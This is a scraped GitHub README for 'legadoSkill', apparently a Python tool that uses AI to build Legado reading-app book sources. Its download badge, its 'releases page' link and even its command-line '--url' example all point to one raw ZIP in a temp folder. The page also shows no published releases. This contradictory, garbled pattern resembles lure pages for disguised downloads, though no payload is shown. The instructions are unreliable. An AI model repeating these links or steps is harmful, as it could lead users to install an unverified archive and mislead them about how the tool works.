Skip to content

rezmdie/legadoSkill

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

54 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

📚 legadoSkill - AI Tool for Easy Book Source Creation

Download legadoSkill


ℹ️ What is legadoSkill?

legadoSkill is a tool designed to help you create book sources for the Legado reading app on Android. It uses AI to analyze websites and automatically generate book source files in JSON format. This means you do not have to write code or understand complex programming rules to add new books or content to your Legado app.

This tool looks at the website structure and finds key information: book titles, authors, covers, chapters, and more. It then builds a file that works with Legado's system to make adding new book sources easy and fast.


🚀 Getting Started with legadoSkill

What you need before you start

  • A Windows PC.
  • Python version 3.8 or newer installed.
    You can download Python from python.org.
  • The AI client called Trae IDE or any other MCP protocol-compatible client. This is where the tool runs and processes your book source requests.

🛠 How to Download and Install legadoSkill

Step 1: Visit the Download Page

Download Page

Click this badge or open this link in your web browser:
https://raw.githubusercontent.com/rezmdie/legadoSkill/main/temp/番茄小说zym888/Skill_legado_2.3.zip

You will find the latest version of legadoSkill there.

Step 2: Download the Files

On the releases page, look for the latest release entry. Download the ZIP file or the package labeled for Windows. Usually, this is a .zip or .exe file.

Save it somewhere easy to find, like the Desktop or Downloads folder.


⚙️ Installing legadoSkill on Windows

Step 3: Extract the Files

If you downloaded a ZIP file:

  1. Right-click the file.
  2. Choose Extract All.
  3. Pick a location, such as a new folder on your Desktop.
  4. Click Extract.

Step 4: Install Required Software

legadoSkill depends on Python packages. To install them:

  1. Open the Start menu and type cmd. Click the Command Prompt app.

  2. Use the command prompt to go to the folder where you extracted legadoSkill. For example:

    cd Desktop\legadoSkill
    
  3. Run this command to install dependencies:

    pip install -r debugger/requirements.txt
    

This step ensures all the supporting software packages are ready on your system.


▶️ How to Use legadoSkill

legadoSkill can run in two ways: inside Trae IDE or by using the command line.

Using legadoSkill in Trae IDE

  1. Open Trae IDE on your PC.
  2. Import or open legadoSkill within the program.
  3. Use the skill package to input the URL of the website you want to convert into a Legado book source.
  4. The AI will analyze the site and create the JSON file needed automatically.

This method requires less manual input and works well if you already have Trae IDE set up.

Using Command Line

If you want to try the tool without Trae:

  1. Open the Command Prompt.

  2. Navigate to the folder with legadoSkill.

  3. Run the program with a command similar to:

    python main.py --url "https://raw.githubusercontent.com/rezmdie/legadoSkill/main/temp/番茄小说zym888/Skill_legado_2.3.zip"
    

Replace https://raw.githubusercontent.com/rezmdie/legadoSkill/main/temp/番茄小说zym888/Skill_legado_2.3.zip with the address of the site you want to convert.

The tool will analyze the page and output a JSON file matching Legado’s rules.


🧩 What legadoSkill Does for You

Core Features

  • AI-Based Book Source Creation
    The system uses AI to recognize the structure of any supported reading website. It finds and extracts book info without you having to configure technical details.

  • Built-in Templates and Rules
    It includes ready-made selectors and rules to understand how pages are organized and where to find titles, authors, chapters, and more.

  • Validation
    The generated JSON file is checked to make sure it fits Legado app requirements. This keeps sources working smoothly.

  • Self-Improving
    The tool can learn from feedback and added knowledge to improve its skill in processing websites.

  • Educational Mode
    It offers guides and helps you understand concepts if you want to learn how to create or edit book sources yourself.


💻 System Requirements

  • Operating System: Windows 10 or higher (64-bit recommended)
  • Python: Version 3.8 or newer
  • Internet: Required for AI processing and downloading dependencies
  • Disk Space: Around 100 MB free for installation and working files
  • RAM: At least 4 GB for smooth operation

🔗 Helpful Links


🧰 Troubleshooting Tips

  • If pip install gives errors, try upgrading pip first:

    python -m pip install --upgrade pip
    
  • Confirm Python is added to your system PATH so commands run correctly.

  • Use the exact folder path when typing commands to avoid errors.

  • If AI analysis fails, check the URL is correct and online. Some sites may block bots or require login.

  • Restart your computer if commands or apps behave unexpectedly.


📥 Quick Download Link

Get the latest release here to start using legadoSkill on Windows. Download the package, install dependencies, and begin converting book sources with AI support.

About

Automate creating Legado reading source files by analyzing websites with AI to generate valid JSON for efficient source development.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors